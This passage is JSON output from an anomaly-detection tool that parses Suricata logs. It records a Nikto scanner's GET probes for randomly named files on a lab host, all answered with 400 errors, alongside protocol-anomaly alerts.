"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46922, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1513189976763438,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1513189976763438, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.325456+0000\",\"flow_id\":1513189976763438,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.327360 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46924 -> 192.168.10.154:80", "/parser/model/time": 1583349514.32736, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", 
"/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46924, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.327360 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46924 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pdf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.327560+0000\",\"flow_id\":15431801437120,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.32756, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":15431801437120,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pdf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pdf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pdf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pdf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46924, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":15431801437120,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 15431801437120, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.327560+0000\",\"flow_id\":15431801437120,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.328985 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46926 -> 192.168.10.154:80", "/parser/model/time": 1583349514.328985, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46926, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.328985 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46926 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pw", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.329101+0000\",\"flow_id\":593912356536889,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.329101, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":593912356536889,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pw\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pw\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pw", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pw", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46926, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":593912356536889,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 593912356536889, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.329101+0000\",\"flow_id\":593912356536889,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.330544 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46928 -> 192.168.10.154:80", "/parser/model/time": 1583349514.330544, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46928, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.330544 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46928 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cobalt", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.330734+0000\",\"flow_id\":246780214773980,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.330734, 
"/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":246780214773980,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cobalt\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", 
